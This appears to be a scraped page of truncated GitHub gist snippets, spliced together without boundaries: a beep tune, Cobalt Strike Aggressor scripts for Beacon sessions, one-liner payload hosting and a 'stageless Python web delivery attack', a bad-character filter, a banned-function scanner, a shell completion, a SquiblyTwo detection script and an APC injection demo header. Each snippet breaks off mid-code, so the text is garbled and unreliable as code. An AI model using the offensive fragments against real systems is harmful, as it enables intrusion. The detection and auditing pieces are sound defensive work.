@SadProcessor
SadProcessor / Get-RickAstley.ps1
Created March 21, 2016 23:46
Not intended for nefarious purposes...
function Get-RickAstley(){
[console]::beep(440,150)#A
[console]::beep(493,150)#B
[console]::beep(587,150)#D
[console]::beep(493,150)#B
Start-Sleep -m 20
[console]::beep(698,400)#F
[console]::beep(698,400)#F
[console]::beep(659,500)#E
Start-Sleep -m 50
# getexplorerpid($bid, &callback);
sub getexplorerpid {
bps($1, lambda({
local('$pid $name $entry');
foreach $entry (split("\n", $2)) {
($name, $pid) = split("\\s+", $entry);
if ($name eq "explorer.exe") {
# $1 is our Beacon ID, $pid is the PID of explorer.exe
[$callback: $1, $pid];
}
@rsmudge
rsmudge / getenv.cna
Last active December 11, 2019 19:45
#
# Aggressor Script means to parse/use environment vars in a Beacon session.
#
global('%bvars');
# request environment variables for every new Beacon that comes in.
on beacon_initial {
# ideally, we'd have a bshell that could take callbacks. We don't have
# this yet. Eventually though, we will.
sub IsSafe {
#http://sleep.dashnine.org/manual/index.html
local('$pos');
@badchars = @(";", "&", '$', "'");
foreach $index => $value (@badchars)
{
$pos = indexOf($1, $value);
if (-isnumber $pos)
{
println("Invalid char detected");
# This script locates potentially dangerous functions that could introduce a vulnerability if they are used incorrectly.
#@author: VDA Labs (Michael Fowl)
#@category Functions
print "Searching for banned functions..."
# Microsoft SDL banned.h list.
blist = (["strcpy", "strcpyA", "strcpyW", "wcscpy", "_tcscpy", "_mbscpy", "StrCpy",
"StrCpyA", "StrCpyW", "lstrcpy", "lstrcpyA", "lstrcpyW", "_tccpy", "_mbccpy",
"_ftcscpy", "strcat", "strcatA", "strcatW", "wcscat", "_tcscat", "_mbscat",
@rsmudge
rsmudge / oneliner.cna
Created July 7, 2016 21:07
How to host a large script via Beacon and grab it with a one-liner that connects to localhost.
# host a PowerShell script on a one-off web server via Beacon.
#
# Why? Generate one-liners for length constrained command execution opportunities
#
# NOTE: this uses internal APIs and is subject to break in the next release. Don't hate!
# if there's interest in this capability, I can build an official API for it.
import common.*;
import beacon.*;
_qvm-run() {
local app_vms
app_vms=( $(qvm-ls --raw-list|grep -v "^dom0$") )
local exc=
if (( words[(I)--all] )); then
exc="*--exclude=[When --all is used: exclude this VM name (may be repeated)]:QubesVMs:($app_vms)"
fi
_arguments -S '(-a --auto)'{-a,--auto}'[Auto start the VM if not running]'\
@N3mes1s
N3mes1s / Detect-SquiblyTwo.ps1
Created April 18, 2018 22:21
detect squiblytwo using wmic original filename, format in cmdline and dll loading
### ref: https://twitter.com/dez_/status/986614411711442944
Write-Host "Current Pid: " $Pid
(Get-Process -Id $pid).priorityclass = "RealTime"
$Query = 'SELECT * FROM __InstanceCreationEvent WITHIN 0.0001 WHERE TargetInstance ISA "Win32_Process"'
$action = {
$e = $Event.SourceEventArgs.NewEvent.TargetInstance
$fmt = 'ProcessStarted: (ID={0,5}, Parent={1,5}, cmdline={2}, ExecutablePath="{3}, Name={4}")'
$msg = $fmt -f $e.ProcessId, $e.ParentProcessId, $e.CommandLine, $e.ExecutablePath, $e.Name
@dfirfpi
dfirfpi / uapc_inject.py
Created March 17, 2017 22:38
QueueUserAPC injection Python demo test
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2017, Francesco "dfirfpi" Picasso <francesco.picasso@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
@rsmudge
rsmudge / stagelesspython.cna
Created April 26, 2017 18:15
Stageless Python Web Delivery attack. Kind of fun. I did cheat and use an internal API. :)
# Python Stageless Scripted Web Delivery
# setup our stageless Python Web Delivery attack
sub setup_attack {
local('%options $x86payload $x64payload $url $script');
%options = $3;
# generate our stageless x86 payload
artifact_stageless(%options["listener"], "raw", "x86", $null, $this);
yield;